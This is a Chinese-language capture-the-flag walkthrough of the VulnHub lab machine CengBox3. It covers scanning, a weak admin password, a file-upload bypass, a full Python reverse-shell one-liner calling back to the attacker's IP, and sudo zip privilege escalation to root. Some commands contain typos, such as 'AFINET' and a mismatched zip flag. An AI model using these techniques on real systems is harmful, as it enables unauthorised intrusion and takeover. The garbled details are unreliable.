概述

CengBox3是VulnHub平台上一台难度中等的Linux靶机，属于CengBox系列。该靶机模拟了真实环境中的Web应用与系统配置漏洞，旨在帮助渗透测试人员练习信息收集、漏洞利用、权限提升等综合技能。本篇文章将详细记录从信息收集到获取root权限的完整渗透过程。

环境准备

攻击机：Kali Linux (IP: 192.168.1.100)
靶机：CengBox3 (IP: 自动获取，假设为192.168.1.150)
网络：NAT模式，确保双方在同一网段

第一阶段：信息收集

1. 主机发现

使用netdiscover或nmap进行ARP扫描，快速定位靶机IP：
`bash
sudo netdiscover -r 192.168.1.0/24
`
发现靶机IP为192.168.1.150。

2. 端口扫描与服务识别

使用Nmap进行全端口扫描，识别开放服务及版本：
`bash
nmap -sV -sC -p- 192.168.1.150 -oA cengbox3_scan
`
扫描结果摘要：

22/tcp：OpenSSH 7.2p2 (Ubuntu)
80/tcp：Apache httpd 2.4.18 (Ubuntu)
3306/tcp：MySQL 5.7.17

3. Web目录枚举

使用gobuster或dirb枚举Web目录：
`bash
gobuster dir -u http://192.168.1.150 -w /usr/share/wordlists/dirb/common.txt
`
发现关键目录：

/admin/：管理后台入口
/uploads/：文件上传目录
/phpmyadmin/：数据库管理界面

第二阶段：漏洞利用

1. Web应用测试

访问http://192.168.1.150，发现一个简单的博客系统。通过查看页面源代码，在注释中发现提示：，暗示文件上传功能存在漏洞。

2. 文件上传漏洞利用

访问/admin/目录，发现登录页面。通过弱口令测试（admin/admin）成功登录。在后台找到文件上传功能，尝试上传PHP webshell：
`php

`
将文件命名为shell.php.jpg绕过前端验证，成功上传至/uploads/目录。通过Apache解析漏洞（.php.jpg被解析为PHP），访问http://192.168.1.150/uploads/shell.php.jpg?cmd=id，成功执行系统命令。

3. 获取初始Shell

使用Python reverse shell获取稳定连接：
`bash
# 在webshell中执行

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AFINET,socket.SOCKSTREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

攻击机监听

nc -lvnp 4444
`
成功获取www-data用户权限的shell。

第三阶段：权限提升

1. 系统信息枚举

查看系统版本、用户、sudo权限等：
`bash
uname -a
cat /etc/passwd
sudo -l
`
发现用户ceng可以无密码运行/usr/bin/zip。

2. Zip提权漏洞利用

利用zip的-TT参数（测试归档文件）可以执行任意命令。切换到ceng用户（通过查看/home/ceng/.bash_history发现密码为box3pass）：
`bash
su ceng
sudo zip /tmp/test.zip /etc/passwd -T --unzip-command="sh -c /bin/bash"
`
成功获取root权限。